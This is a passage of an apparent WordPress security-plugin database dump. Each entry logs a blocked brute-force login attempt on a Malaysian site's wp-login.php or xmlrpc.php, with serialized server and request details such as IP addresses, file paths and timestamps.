empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"217.11.48.148\";s:11:\"REMOTE_PORT\";s:5:\"38888\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYH7KCR0vdvYEIduPCLqSQAAARc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568799528.7522\";s:12:\"REQUEST_TIME\";s:10:\"1568799528\";}}','notice','2019-09-18 09:38:50','2019-09-18 09:38:49',17740960,19232488,'https://bintara.com.my/wp-login.php',1,0,'217.11.48.148'),(25007,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"217.11.48.148\";s:11:\"REMOTE_PORT\";s:5:\"39536\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYH7K1lvzIDnRn6zOHXy5wAAAIE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568799531.9996\";s:12:\"REQUEST_TIME\";s:10:\"1568799531\";}}','notice','2019-09-18 09:38:55','2019-09-18 09:38:52',18256960,19555880,'https://bintara.com.my/xmlrpc.php',1,0,'217.11.48.148'),(25008,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"134.209.102.147\";s:11:\"REMOTE_PORT\";s:5:\"58886\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYH9C1lvzIDnRn6zOHX0owAAAIM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568800011.1971\";s:12:\"REQUEST_TIME\";s:10:\"1568800011\";}}','notice','2019-09-18 09:46:52','2019-09-18 09:46:51',17747296,19233904,'https://bintara.com.my/wp-login.php',1,0,'134.209.102.147'),(25009,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"134.209.102.147\";s:11:\"REMOTE_PORT\";s:5:\"58886\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYH9C1lvzIDnRn6zOHX0owAAAIM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568800011.1971\";s:12:\"REQUEST_TIME\";s:10:\"1568800011\";}}','notice','2019-09-18 09:46:53','2019-09-18 09:46:51',17909304,19233904,'https://bintara.com.my/wp-login.php',1,0,'134.209.102.147'),(25010,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"134.209.102.147\";s:11:\"REMOTE_PORT\";s:5:\"59314\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYH9DVlvzIDnRn6zOHX0qAAAAI4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568800013.7745\";s:12:\"REQUEST_TIME\";s:10:\"1568800013\";}}','notice','2019-09-18 09:46:55','2019-09-18 09:46:54',18259672,19557024,'https://bintara.com.my/xmlrpc.php',1,0,'134.209.102.147'),(25011,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.223.127\";s:11:\"REMOTE_PORT\";s:5:\"34776\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYH@rVlvzIDnRn6zOHX2LwAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568800430.0399\";s:12:\"REQUEST_TIME\";s:10:\"1568800430\";}}','notice','2019-09-18 09:53:51','2019-09-18 09:53:50',17743392,19234840,'https://bintara.com.my/wp-login.php',1,0,'128.199.223.127'),(25012,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.223.127\";s:11:\"REMOTE_PORT\";s:5:\"35366\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYH@sFlvzIDnRn6zOHX2MgAAAJM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568800432.9239\";s:12:\"REQUEST_TIME\";s:10:\"1568800432\";}}','notice','2019-09-18 09:53:54','2019-09-18 09:53:53',18257432,19553912,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.223.127'),(25013,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"13.210.34.87\";s:11:\"REMOTE_PORT\";s:5:\"42254\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIAOzYpjlmVadK6PeGW@QAAAMY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568800827.7094\";s:12:\"REQUEST_TIME\";s:10:\"1568800827\";}}','notice','2019-09-18 10:00:30','2019-09-18 10:00:28',17740904,19233320,'https://bintara.com.my/wp-login.php',1,0,'13.210.34.87'),(25014,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"13.210.34.87\";s:11:\"REMOTE_PORT\";s:5:\"43708\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIAQEQGijxhVPhG1M0togAAAAQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568800832.5409\";s:12:\"REQUEST_TIME\";s:10:\"1568800832\";}}','notice','2019-09-18 10:00:33','2019-09-18 10:00:32',18259040,19557560,'https://bintara.com.my/xmlrpc.php',1,0,'13.210.34.87'),(25015,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 